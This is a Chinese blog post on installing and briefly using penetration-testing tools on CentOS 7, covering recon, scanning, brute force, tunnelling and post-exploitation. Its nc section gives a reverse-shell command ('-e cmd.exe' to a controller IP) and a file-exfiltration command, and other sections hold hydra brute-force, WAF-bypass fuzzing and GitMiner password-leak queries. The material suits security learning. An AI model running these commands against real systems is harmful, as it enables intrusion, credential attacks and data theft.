<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="工具地址：https://github.com/Enul1ttle/Centos7PTA 0x01 安装内容 必备组件：net-tools wget bzip texlive alien guntls-utils git pip httpd zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel">
<meta property="og:type" content="article">
<meta property="og:title" content="Centos7渗透工具自动化安装">
<meta property="og:url" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/index.html">
<meta property="og:site_name" content="Enul1ttle">
<meta property="og:description" content="工具地址：https://github.com/Enul1ttle/Centos7PTA 0x01 安装内容 必备组件：net-tools wget bzip texlive alien guntls-utils git pip httpd zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/wafw00f.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/whatweb.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/gitminer.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/recondog.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/subDomainsBrute.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/sublist3r.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/nikto.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/arachni.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/w3af.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/openvas.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/dirsearch.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/xsstrike.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/cmseek.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/snitch.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/sqliv.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/wafinja.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/wfuzz.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/c1.png">
<meta property="og:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/cs2.png">
<meta property="og:updated_time" content="2019-03-15T14:41:18.300Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Centos7渗透工具自动化安装">
<meta name="twitter:description" content="工具地址：https://github.com/Enul1ttle/Centos7PTA 0x01 安装内容 必备组件：net-tools wget bzip texlive alien guntls-utils git pip httpd zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel">
<meta name="twitter:image" content="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/wafw00f.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/">





  <title>Centos7渗透工具自动化安装 | Enul1ttle</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Enul1ttle</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Try a little bit harder</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://enul1ttle.github.io/2019/03/14/Centos7渗透工具自动化安装/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Enul1ttle">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Enul1ttle">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Centos7渗透工具自动化安装</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-14T22:09:45+08:00">
                2019-03-14
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/工具/" itemprop="url" rel="index">
                    <span itemprop="name">工具</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>阅读数
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>数
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><strong>工具地址：</strong><a href="https://github.com/Enul1ttle/Centos7PTA" target="_blank" rel="noopener">https://github.com/Enul1ttle/Centos7PTA</a></p>
<h2 id="0x01-安装内容"><a href="#0x01-安装内容" class="headerlink" title="0x01 安装内容"></a>0x01 安装内容</h2><ul>
<li>必备组件：net-tools wget bzip texlive alien guntls-utils git pip httpd zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gcc make</li>
<li>必备环境：python3 pip3 jdk 1.8</li>
<li>信息收集：whois wafw00f whatweb nmap snitch GitMiner ReconDog subDomainsBrute Sublist3r</li>
<li>漏洞扫描：Nilto openvas Arachni w3af dirsearch XSStrike CMSeek sqliv</li>
<li>漏洞利用 :metasploit sqlmap</li>
<li>模糊测试：WAFNinja Wfuzz</li>
<li>暴力破解：hydra cupp</li>
<li>后渗透工具：nc frp cobaltstrike</li>
</ul>
<h2 id="0x02-工具的介绍与简单使用"><a href="#0x02-工具的介绍与简单使用" class="headerlink" title="0x02 工具的介绍与简单使用"></a>0x02 工具的介绍与简单使用</h2><h3 id="whois"><a href="#whois" class="headerlink" title="whois"></a>whois</h3><ul>
<li><code>whois 域名</code></li>
<li><code>whois IP</code><blockquote>
<p>大佬说whois看似简单，但却非常实用。能收集到管理员的邮箱账号与手机号码等等，可用来社工或生成字典。<code>whois ip</code>运气好的时候能看到目标的IP段</p>
</blockquote>
</li>
</ul>
<h3 id="wafw00f"><a href="#wafw00f" class="headerlink" title="wafw00f"></a>wafw00f</h3><ul>
<li><code>wafw00f https://www.baidu.com</code></li>
</ul>
<p><img src="wafw00f.png" alt></p>
<h3 id="whatweb"><a href="#whatweb" class="headerlink" title="whatweb"></a>whatweb</h3><ul>
<li><code>whatweb:https://www.baidu.com/</code></li>
</ul>
<p><img src="whatweb.png" alt></p>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p>总所周知的神器就不说了<br>添加脚本：<code>git clone https://github.com/cldrn/nmap-nse-scripts &amp;&amp; cp -rf scripts/* /usr/share/nmap/scripts/</code><br>升级script库：<code>nmap --script-updatedb</code><br>使用所有脚本检测：<code>nmap -T4 -A -sV -v3 -d  --script all  ip</code><br>扫描常见的漏洞：<code>nmap --script=vuln</code><br>nmap参考指南：<a href="https://wizardforcel.gitbooks.io/nmap-man-page/content/" target="_blank" rel="noopener">https://wizardforcel.gitbooks.io/nmap-man-page/content/</a></p>
<h3 id="GitMiner"><a href="#GitMiner" class="headerlink" title="GitMiner"></a>GitMiner</h3><p>搜索github项目泄露的敏感信息</p>
<ul>
<li><code>gitminer --query &#39;filename:configuration extension:php &quot;public password&quot; in:file&#39; -m joomla -c cookie.txt</code></li>
</ul>
<p><code>cookie.txt</code> 是自己github账号的cookie</p>
<p><img src="gitminer.png" alt></p>
<h3 id="ReconDog"><a href="#ReconDog" class="headerlink" title="ReconDog"></a>ReconDog</h3><p>信息收集的瑞士军刀<br><img src="recondog.png" alt></p>
<h3 id="subDomainsBrute"><a href="#subDomainsBrute" class="headerlink" title="subDomainsBrute"></a>subDomainsBrute</h3><p>子域名爆破：<code>subDomainsBrute baidu.com</code><br><img src="subDomainsBrute.png" alt></p>
<h3 id="Sublist3r"><a href="#Sublist3r" class="headerlink" title="Sublist3r"></a>Sublist3r</h3><p>使用各大搜索引擎进行子域名采集：<code>sublist3r -d baidu.com</code><br><img src="sublist3r.png" alt></p>
<h3 id="Nikto"><a href="#Nikto" class="headerlink" title="Nikto"></a>Nikto</h3><p>扫描内容：软件版本 、敏感文件 、配置问题 、xss、sql 、运气好能爆出网站的内网IP</p>
<blockquote>
<p><code>nikto -host www.baidu.com</code></p>
</blockquote>
<p><img src="nikto.png" alt></p>
<h3 id="Arachni"><a href="#Arachni" class="headerlink" title="Arachni"></a>Arachni</h3><p>特点：web界面直观 、多功能 、高性能的Ruby框架</p>
<blockquote>
<p>arachni 连接http://<ip>:9292<br>默认账号密码：<a href="mailto:admin@admin.admin" target="_blank" rel="noopener">admin@admin.admin</a>  administrator</ip></p>
</blockquote>
<p><img src="arachni.png" alt></p>
<h3 id="w3af"><a href="#w3af" class="headerlink" title="w3af"></a>w3af</h3><p>没有完美的扫描器，多个一起食用效果才能更佳<br><img src="w3af.png" alt></p>
<h3 id="openvas"><a href="#openvas" class="headerlink" title="openvas"></a>openvas</h3><p>弱点扫描，nessue开源的分支</p>
<blockquote>
<p><code>https://&lt;IP&gt;:9392</code></p>
</blockquote>
<p>新建任务：<code>Scans-&gt;Tasks-&gt;再点击左上角的仙女魔法棒</code><br><img src="openvas.png" alt></p>
<h3 id="dirsearch"><a href="#dirsearch" class="headerlink" title="dirsearch"></a>dirsearch</h3><p>目录爆破，配合御剑典藏版的字典，很强大</p>
<blockquote>
<p><code>dirsearch -u www.baidu.com -e php</code></p>
</blockquote>
<p><img src="dirsearch.png" alt></p>
<h3 id="XSStrike"><a href="#XSStrike" class="headerlink" title="XSStrike"></a>XSStrike</h3><p>主要特点：反射型和DOM XSS扫描、多线程抓取 、可配置的核心、WAF检测和绕过</p>
<blockquote>
<p><code>xsstrike -u https://exmple.com/?e=qe3</code></p>
</blockquote>
<p><img src="xsstrike.png" alt></p>
<h3 id="CMSeek"><a href="#CMSeek" class="headerlink" title="CMSeek"></a>CMSeek</h3><p>检测超过155款CMS</p>
<blockquote>
<p><code>cmseek</code></p>
</blockquote>
<p><img src="cmseek.png" alt></p>
<h3 id="snitch"><a href="#snitch" class="headerlink" title="snitch"></a>snitch</h3><p>使用谷歌黑客语法自动化采集敏感信息工具</p>
<blockquote>
<p><code>snitch -D ext -U baidu.com -P15</code></p>
</blockquote>
<p><img src="snitch.png" alt></p>
<h3 id="sqliv"><a href="#sqliv" class="headerlink" title="sqliv"></a>sqliv</h3><p>配合谷歌黑客语法对子域名多的目标进行初步SQL检测是个不错的选择</p>
<blockquote>
<p><code>sqliv -d &quot;site:baidu.com inurl:?id=&quot; -e google</code></p>
</blockquote>
<p><img src="sqliv.png" alt></p>
<h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>sqlmap中文手册：<a href="https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/" target="_blank" rel="noopener">https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/</a></p>
<h3 id="WAFNinja"><a href="#WAFNinja" class="headerlink" title="WAFNinja"></a>WAFNinja</h3><p>灵活的WAF自动化Fuzz工具</p>
<blockquote>
<p><code>wafinja bypass -u &quot;http://www.target.com/index.php&quot;  -p &quot;Name=PAYLOAD&amp;Submit=Submit&quot; 
-c &quot;phpsessid=value&quot; -t xss -o output.html</code></p>
</blockquote>
<p><img src="wafinja.png" alt></p>
<blockquote>
<p>快速启动命令我改为wafinja，感觉舒服点</p>
</blockquote>
<h3 id="Wfuzz"><a href="#Wfuzz" class="headerlink" title="Wfuzz"></a>Wfuzz</h3><p>fuzzing</p>
<blockquote>
<p><code>wfuzz -c -z range,1-20 https://tongji.baidu.com/web/help/article?id=FUZZ</code></p>
</blockquote>
<p><img src="wfuzz.png" alt><br>fuzz字典</p>
<ul>
<li><a href="https://github.com/Stardustsky/SaiDict" target="_blank" rel="noopener">https://github.com/Stardustsky/SaiDict</a></li>
<li><a href="https://github.com/fuzzdb-project/fuzzdb" target="_blank" rel="noopener">https://github.com/fuzzdb-project/fuzzdb</a></li>
</ul>
<h3 id="cupp"><a href="#cupp" class="headerlink" title="cupp"></a>cupp</h3><p>社工字典生成，适合生成外国佬的密码</p>
<ul>
<li><code>cupp -i</code></li>
</ul>
<h3 id="hydra"><a href="#hydra" class="headerlink" title="hydra"></a>hydra</h3><p>爆破神器</p>
<ul>
<li><code>hydra -l user -P passlist.txt ftp://192.168.0.1</code></li>
</ul>
<h3 id="frp"><a href="#frp" class="headerlink" title="frp"></a>frp</h3><p>服务端frps.ini<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">server_port = 7000</span><br><span class="line">auth_token = 001</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>auth_token 相当于密码，可选<br>启动：<code>frps</code></p>
</blockquote>
<p>客户端frpc.ini<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">server_addr = 服务端IP</span><br><span class="line">server_port = 7000</span><br><span class="line">auth_token = 001</span><br><span class="line">#将本地3389转发到服务端的6000</span><br><span class="line">type = tcp</span><br><span class="line">local_ip = 127.0.0.1</span><br><span class="line">local_port = 3389</span><br><span class="line">remote_port = 6000</span><br></pre></td></tr></table></figure></p>
<p> 启动:<code>frpc.exe -c frpc.ini</code></p>
<blockquote>
<p>服务端和客户端版本号要对应</p>
</blockquote>
<h3 id="nc"><a href="#nc" class="headerlink" title="nc"></a>nc</h3><p>反弹shell</p>
<blockquote>
<p>靶机：<code>nc.exe -vv 控制端IP 6666 -e cmd.exe</code><br>控制机：<code>nc -lvp 6666</code></p>
</blockquote>
<p>传输文件</p>
<blockquote>
<p>控制机：<code>nc -l 6666 &gt;1.txt</code><br>靶机：<code>nc 控制端IP 6666 &lt; c:\1.txt</code></p>
</blockquote>
<h3 id="metasploit"><a href="#metasploit" class="headerlink" title="metasploit"></a>metasploit</h3><p>micropoor：<a href="https://micro8.gitbook.io/micro8/contents" target="_blank" rel="noopener">https://micro8.gitbook.io/micro8/contents</a></p>
<h3 id="cobaltstrike"><a href="#cobaltstrike" class="headerlink" title="cobaltstrike"></a>cobaltstrike</h3><p>后渗透神器，很方便很舒服，谁用谁知道。</p>
<blockquote>
<p><code>cs 服务器IP password</code></p>
</blockquote>
<p><img src="c1.png" alt></p>
<blockquote>
<p>操作机：<code>java -jar cobaltstrike.jar</code><br><img src="cs2.png" alt></p>
</blockquote>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/14/渗透测试在线资料整理/" rel="next" title="渗透测试在线资料整理">
                <i class="fa fa-chevron-left"></i> 渗透测试在线资料整理
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/15/MobSF/" rel="prev" title="MobSF">
                MobSF <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Enul1ttle</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-安装内容"><span class="nav-number">1.</span> <span class="nav-text">0x01 安装内容</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-工具的介绍与简单使用"><span class="nav-number">2.</span> <span class="nav-text">0x02 工具的介绍与简单使用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#whois"><span class="nav-number">2.1.</span> <span class="nav-text">whois</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wafw00f"><span class="nav-number">2.2.</span> <span class="nav-text">wafw00f</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#whatweb"><span class="nav-number">2.3.</span> <span class="nav-text">whatweb</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-number">2.4.</span> <span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#GitMiner"><span class="nav-number">2.5.</span> <span class="nav-text">GitMiner</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ReconDog"><span class="nav-number">2.6.</span> <span class="nav-text">ReconDog</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#subDomainsBrute"><span class="nav-number">2.7.</span> <span class="nav-text">subDomainsBrute</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Sublist3r"><span class="nav-number">2.8.</span> <span class="nav-text">Sublist3r</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Nikto"><span class="nav-number">2.9.</span> <span class="nav-text">Nikto</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Arachni"><span class="nav-number">2.10.</span> <span class="nav-text">Arachni</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#w3af"><span class="nav-number">2.11.</span> <span class="nav-text">w3af</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#openvas"><span class="nav-number">2.12.</span> <span class="nav-text">openvas</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dirsearch"><span class="nav-number">2.13.</span> <span class="nav-text">dirsearch</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSStrike"><span class="nav-number">2.14.</span> <span class="nav-text">XSStrike</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CMSeek"><span class="nav-number">2.15.</span> <span class="nav-text">CMSeek</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#snitch"><span class="nav-number">2.16.</span> <span class="nav-text">snitch</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqliv"><span class="nav-number">2.17.</span> <span class="nav-text">sqliv</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap"><span class="nav-number">2.18.</span> <span class="nav-text">sqlmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WAFNinja"><span class="nav-number">2.19.</span> <span class="nav-text">WAFNinja</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Wfuzz"><span class="nav-number">2.20.</span> <span class="nav-text">Wfuzz</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cupp"><span class="nav-number">2.21.</span> <span class="nav-text">cupp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hydra"><span class="nav-number">2.22.</span> <span class="nav-text">hydra</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#frp"><span class="nav-number">2.23.</span> <span class="nav-text">frp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nc"><span class="nav-number">2.24.</span> <span class="nav-text">nc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#metasploit"><span class="nav-number">2.25.</span> <span class="nav-text">metasploit</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cobaltstrike"><span class="nav-number">2.26.</span> <span class="nav-text">cobaltstrike</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Enul1ttle</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>






        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
